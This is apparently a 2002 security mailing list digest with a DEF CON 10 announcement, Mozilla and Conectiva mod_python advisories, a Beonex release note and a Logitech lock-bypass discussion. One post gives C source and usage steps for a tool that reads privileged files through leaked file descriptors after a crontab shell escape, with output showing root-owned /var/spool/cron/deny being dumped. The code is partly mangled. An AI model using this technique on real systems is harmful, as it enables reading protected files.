Announcing DEF CON 10!

[The Dark Tangent]

  D E F  C O N  10   C O N V E N T I O N
  D E F  C O N  10   C O N V E N T I O N
DEF CON 10 CONVENTION
  D E F  C O N  10   C O N V E N T I O N

READ AND DISTRIBUTE AND READ AND DISTRIBUTE AND READ AND 

Initial Announcement: 05/01/2002

We are proud to announce the 10th annual Def Con.

The 10th anniversary of what has become the largest hacker
convention on the planet! DEF CON 10 will be August 2nd to the 4th
at the Alexis Park Hotel and Resort in Las Vegas, Nevada, USA.


[ What is DEF CON ]

Defcon is a convention for the more underground elements of the
computer culture. Defcon is geared towards hackers, programmers,
phreaks, cyberpunks, cypherpunks, open source hackers, civil liberty
and privacy advocates, HAMs, casual bystanders, lookieloos, feds,
reporters, and anyone interested in seeing what's going on in the
computer underground today.


[ What's Happening ]

WHO:   You know who you are, you shady characters.
WHAT:  A convention for you to meet, party, and listen to some speeches
that you would normally never hear.
WHEN:  August 2nd to the 4th - 2002
WHERE: Las Vegas, Nevada @ The Alexis Hotel  Resort

Taking advantage of expanded meeting space this year, there will not
only be three tracks of speaking, but two break out areas for small
mini-classes on select topics.

For complete up to the minute information visit http://www.defcon.org/
The following is a brief overview of what to expect.


[ Wireless Network ]

At DC 9 we grew the coverage of the wireless network to cover most of
the Alexis Park. We operate an 802.11b wireless network with a gateway
to the net. It is a wide open network with no WEP security, assigning
addresses by a DHCP server. Yes, people mess with the DHCP server, but
all in all it works well.

NEW for this year: DEF CON will continue to grow the network, as well
as provide some dedicated servers for attendees to use. For example we
will have a web/ftp server set up where people can upload pictures they
have taken in order to share them with the rest of the con attendees.
DEF CON will also have a limited amount of 802.11a access points for
Really high speed access. While all this great bandwidth is limited by
our net connection, it will be great for people on the local network to
swap pictures and data.


[ Call for Papers ]

If you are interested in speaking at DEF CON TEN, please read this Call
for Papers announcement and follow the directions to submit a talk.
http://www.defcon.org/html/dc10/defcon-10-cfp.html


[ Speaking ]

There will be three speaking areas and two break out areas for
demonstration and classes. Speaking will start an hour or two later in
the day than in previous years, and go an hour later into the evening.
Look to the web site once speakers have been selected for the exact
schedule and changes.


[ Break Out Areas ]

The two break out areas will hold around 150 people each, and will be
used for specific demonstrations or talks that would not work well in
the really large speaking areas. An example of a break out talk might
be on how to modify your TiVO, where audience members would be walked
through working on their own TiVO. Topics such as radio modification,
killer robot building, chipping your PS2, etc. would all work well for
the break out areas.


[ Hotel Room Video ]

We've gotten the bugs worked out of the hotel's broadcast system. This
year we will be broadcasting 3 separate channels on the hotel's
internal TV system. One channel will be playing movies, anime, and
other kinds of entertainment. The other two will be used for
broadcasting the speakers. This should help with the overcrowding that
sometimes occurs, as well as allowing out attendees to relax in their
rooms and not miss anything.


[ Streaming Audio/Video ]

Provided we have the bandwidth, we will be streaming all of the audio
and video from the event. Hopefully, we can put up a few reflectors in
different geographical area so that folks in all parts of the wired
world will be able to tune in and see what's going on.

OFFICIAL EVENTS

[ Capture the Flag Contest ]

An expanded version of the classic CTF contest, this year will feature
more audience participation. There will be multiple IDS systems plugged
into wall projectors reporting on what is happening, as well as some
custom filters to keep track of what team is ahead. NEW for this year,
with the help of the three time CTF winners, the Ghetto Hackers, this
years contest will be all new and action oriented.
http://www.ghettohackers.net/ctf/ has all the latest contest
information.


[ DJs ]

There will be DJs again at DEF CON, but there will be no DJ room as in
past years. Instead this year there will be more of a cool out lounge
with DJs, chairs, and it will be more of a place to hang out. The party
is nice for the Black and White ball on Saturday night, but in the mean
time we want to provide that space for you 

Fix for Mozilla XMLHttpRequest file disclosure vulnerability

[Frank Hecker]

For those not already aware of this, note that a fix for the 
XMLHttpRequest file disclosure vulnerability (Bugtraq id 4628) reported 
by GreyMagic Software has been checked into the Mozilla source tree. The 
fix is included in new Mozilla 1.0 branch nightly builds dated 2 May 
2002 or later available through mozilla.org:

http://ftp.mozilla.org/pub/mozilla/nightly/latest-1.0.0/

and will be included in the upcoming Mozilla 1.0 release and any further 
1.0 Release Candidates distributed through mozilla.org. For more 
information on the fix please see bug report 141061 in the Mozilla 
project's public bug database:

http://bugzilla.mozilla.org/show_bug.cgi?id=141061

On behalf of the Mozilla community we at mozilla.org thank all the 
people who participated in discovering, reporting, investigating, and 
fixing this bug.

As a reminder, reports of Mozilla-related security vulnerabilities can 
be reported via email to [EMAIL PROTECTED], and will be handled in 
accordance with the mozilla.org on handling security bugs:

http://www.mozilla.org/projects/security/security-bugs-policy.html

Frank

-- 
Frank Hecker
[EMAIL PROTECTED]

[CLA-2002:477] Conectiva Linux Security Announcement - mod_python

[secure]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --

PACKAGE   : mod_python
SUMMARY   : Remote vulnerability
DATE  : 2002-05-03 17:35:00
ID: CLA-2002:477
RELEVANT
RELEASES  : 7.0, 8

- -

DESCRIPTION
 Mod_python is an Apache module that embeds the Python interpreter
 within the server.
 
 As stated[1] by Allan Saddi in the mailing list of mod_python, there
 was a vulnerability which would allow a publisher to access an
 indirectly imported module, thus allowing a remote attacker to call
 functions from that module (which is an unexpected and potentially
 dangerous behavior).


SOLUTION
 All mod_python users should do the upgrade. Notice that after the
 installation you have to restart the httpd service manually in order
 to load the new module. To achieve this you can execute the following
 command (as root):
 
 # service httpd restart
 
 
 REFERENCES:
 1.http://www.modpython.org/pipermail/mod_python/2002-April/001991.html


DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/mod_python-2.7.8-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/mod_python-2.7.8-1U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/mod_python-2.7.8-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/mod_python-2.7.8-1U8_1cl.src.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:
 - add the following line to /etc/apt/sources.list if it is not there yet
   (you may also use linuxconf to do this):

 rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(replace 6.0 with the correct version number if you are not running CL6.0)

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions reagarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- -
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE80vT242jd0JmAcZARAlo+AJ0Xi/BKHJ556v4A1uOSyEVMD1pVKgCgkKDO
Ak2JwqgiKhJEXGmMOj2w0Hg=
=z2C9
-END PGP SIGNATURE-

Re: trusting user-supplied data (was Re: FreeBSD Security AdvisoryFreeBSD-SA-02:23.stdio)

[Paul Starzetz]

Steven M. Bellovin wrote:

The list includes, but is not limited to:

   command-line array
   environment array
   open files


I don't think there was enough research on open file descriptor 
problems. For example, I found this small bug while playing yround with 
crontab on Linux:

gcc cronread.c -o cronread

export VISUAL=/bin/vi
crontab -e

:sh escape to shell

./cronread

 iz OPENst_uid 24129st_gid 5PATH /dev/pts/15/fd/0   
dump (y/n) n

0001 iz OPENst_uid 24129st_gid 5PATH /dev/pts/15/fd/1   
dump (y/n) n

0002 iz OPENst_uid 24129st_gid 5PATH /dev/pts/15/fd/2   
dump (y/n) n

0003 iz OPENst_uid 0st_gid 0PATH 
/var/spool/cron/deny   dump (y/n) y

--- DUMPING /var/spool/cron/deny ---

guest
gast


---
0005 iz OPEN
0006 iz OPEN


ls -l /var/spool/cron/deny
-rw---1 root root   11 Oct 25  2001 /var/spool/cron/deny


So I'm able to read a privileged system file using this technique :- 
Not necessary to mention the consequences of inheriting such a fd open 
for writing. More effort must be put to investigate this problem in 
current Linux/Unix suid/setgid binaries.

have fun with the attached source.

/ih



/
*   *
*   insecure FD seeker  *
*   by IhaQueR '2002*
*   *
/





#include stdio.h
#include unistd.h
#include fcntl.h
#include sys/types.h
#include sys/stat.h
#include linux/limits.h



#define TMPLEN 1024



void dumpfd(int fd, char *name)
{
int r;
char c=13;


r = lseek(fd, 0, SEEK_SET);
if(r == (off_t)-1) {
perror(lseek);
return;
}
printf(\n--- DUMPING %s ---\n\n, name);
do {
r = read(fd, c, sizeof(c));
if(r0) {
printf(%c, c);
}
} while(r0);
printf(\n\n---);
fflush(stdout);
}


int main()
{
int i, r, f;
uid_t uid;
gid_t gid;
struct stat st;
char buf[TMPLEN];


uid = getuid();
gid = getgid();

for(i=0; iNR_OPEN; i++) {
r = fstat(i, st);
if(!r) {
printf(\n%.4d iz OPEN, i);
if(st.st_uid != uid || st.st_gid != gid) {
printf(\tst_uid %d\tst_gid %d, st.st_uid, st.st_gid);
snprintf(buf, sizeof(buf)-1, /proc/%d/fd/%d, 
getpid(), i);
buf[sizeof(buf)-1] = 0;
readlink(buf, buf, sizeof(buf)-1);
buf[sizeof(buf)-1] = 0;
printf(\tPATH %s , buf);
printf(\tdump (y/n) );
r = getchar();
if(r == 'y')
dumpfd(i, buf);
getchar();
}
}
}
printf(\n\n);
fflush(stdout);

return 0;
}

Re: Logitech Keyboard Insecurity

[KJK::Hyperion]

At 00.15 03/05/2002, you wrote:
  Logitech has been contacted about 1 month ago and they have confirmed 
 it is indeed a problem with their software, but a fix is not yet out. A 
 'locked' computer should indeed be locked, and not accessible via any 
 means. While this bug is a low risk, it shows how *obvious* flaws go 
 undetected. It totally bypasses GINA (Graphical Identification aNd 
 Authentication), which is supposed to keep the PC secure (to the extend 
 of requireing Ctrl-Alt-Delete to login).
Hrrm...  Is the driver signed by Microsoft?  If it is, that seems to be 
something that Microsoft should be checking from now on before they 
certify keyboard drivers.

It's not the driver's fault. I highly doubt Microsoft would ever sign, no, 
wait, that Logitech would ever WRITE a driver that launched user-mode 
processes at all, as it's undocumented, unsupported, prone to errors, and 
hideosuly unsecure, not to mention very tedious to code and debug, with 
many hidden pitfalls (having rewritten Win32 CreateProcess for personal 
exercise using only NT kernel functions, I know). This doesn't apply to 
Windows 95, where launching user-mode apps from device drivers, and 
generally breaking the user-kernel barrier, is unbelievably straightforward

The hidden app that communicates with the driver (you know, the small 
bugger in the system tray) and manages the special keys is to blame, and 
it's not signed for sure - AFAIK they only sign kernel-mode executables

This is lousy design, BTW. They shouldn't allow apps to completely subvert 
the Windows input chain by allowing them to communicate directly with the 
keyboard driver, like I guess they do - the special keys should be sent as 
F13, F14, and so on, and the launcher app should receive them only by 
registering the appropriate hotkeys for the current desktop

Beonex Communicator 0.8-pre based on Mozilla 1.0-branch released

[Ben Bucksch]

The Open-Source-Project Beonex, dedicated to bring Mozilla to the 
masses, released version 0.8-pre of Beonex Communicator for Windows and 
Linux. It bases in Mozilla1.0-branch code from around 2002-04-30 and can 
be downloaded at http://www.beonex.com/communicator.

Beonex Communicator was never vulnerable to the XMLHttpRequest attack. 
Earlier versions might have been vulnerable to other symptoms of the 
same bug, though, so the new version includes the fix previously 
announced by Frank Hecker.

The IRC scheme crash reported as followup is believed not to be exploitable.

It is strongly recommended that users of earlier versions of Beonex 
Communicator upgrade to the new version, because older versions contain 
said bugs and are no longer supported.

Ben Bucksch
Beonex